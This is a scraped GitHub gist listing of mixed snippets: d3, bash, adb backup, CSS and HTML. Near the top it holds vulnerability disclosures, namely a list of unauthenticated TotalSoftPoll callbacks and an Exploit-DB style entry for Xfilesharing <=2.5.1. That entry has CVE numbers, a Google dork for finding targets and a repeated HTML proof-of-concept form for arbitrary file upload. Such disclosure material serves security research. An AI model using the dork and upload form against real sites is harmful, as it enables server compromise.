Skip to content

Instantly share code, notes, and snippets.

An attacker can call following functions as an unauthenticated user.
TotalSoftPoll_Clone_Callback
TotalSoftPoll_Del_Callback
TotalSoftPoll_Edit_Callback
TotalSoftPoll_Edit_Q_M_Callback
TotalSoftPoll_Edit_Ans_Callback
TotalSoftPoll_Theme_Clone_Callback
TotalSoftPoll_Theme_Edit_Callback
TotalSoftPoll_Theme_Edit1_Callback
@weisk
weisk / Exploit-DB-Xfilesharing.txt
Created May 13, 2020 01:27 — forked from pak0s/Exploit-DB-Xfilesharing.txt
Xfilesharing <=2.5.1 Arbitrary File Upload and Local File Inclusion
# Exploit Title: Xfilesharing <=2.5.1 Arbitrary File Upload and Local File Inclusion
# Google Dork: inurl:/?op=registration
# Date: 14th Nov, 2019
# Exploit Author: Noman Riffat
# Vendor Homepage: https://sibsoft.net/xfilesharing.html
# Version: <=2.5.1
# CVE : CVE-2019-18951, CVE-2019-18952
#####################
Arbitrary File Upload
@weisk
weisk / xfilesharing.txt
Created May 13, 2020 01:27 — forked from pak0s/xfilesharing.txt
Xfilesharing <=2.5.1 Arbitrary File Upload and Local File Inclusion
#####################
Arbitrary File Upload
#####################
<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
<input type="text" name="sid" value="joe">
<input type="file" name="file">
<input type="submit" value="Upload" name="submit">
</form>
@weisk
weisk / xfilesharing.txt
Created May 13, 2020 01:27 — forked from pak0s/xfilesharing.txt
Xfilesharing <=2.5.1 Arbitrary File Upload and Local File Inclusion
#####################
Arbitrary File Upload
#####################
<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
<input type="text" name="sid" value="joe">
<input type="file" name="file">
<input type="submit" value="Upload" name="submit">
</form>
@weisk
weisk / .block
Created May 28, 2020 02:57 — forked from mbostock/.block
Zoomable Circle Packing
license: gpl-3.0
height: 960
redirect: https://observablehq.com/@d3/d3-zoomable-circle-packing
#!/bin/bash
###
### my-script — does one thing well
###
### Usage:
### my-script <input> <output>
###
### Options:
### <input> Input file to read.
### <output> Output file to write. Use '-' for stdout.
@weisk
weisk / android-backup-apk-and-datas.md
Created August 8, 2020 09:16 — forked from AnatomicJC/android-backup-apk-and-datas.md
Backup android app, data included, no root needed, with adb

Backup android app, data included, no root needed, with adb

adb is the Android CLI tool with which you can interact with your android device, from your PC

You must enable developer mode (tap 7 times on the build version in parameters) and install adb on your PC.

Fetch application APK

To get the list of your installed applications:

@weisk
weisk / dabblet.css
Created September 21, 2020 16:55
Well Hi
/**
* Well Hi
*/
background: #f06;
background: linear-gradient(45deg, #f06, yellow);
min-height: 100%;
@weisk
weisk / index.html
Created October 23, 2020 13:44
Portfolio Filter Gallery
<section class="portfolio section">
<div class="container">
<div class="top-side">
<h4 class="title">MY WORKS</h4>
<h2>PORTFOLIO</h2>
</div>
<div class="filters">
<ul>
<li class="active" data-filter="*">All</li>
@weisk
weisk / fffff.gif
Last active December 5, 2020 15:20
Eye phone
fffff.gif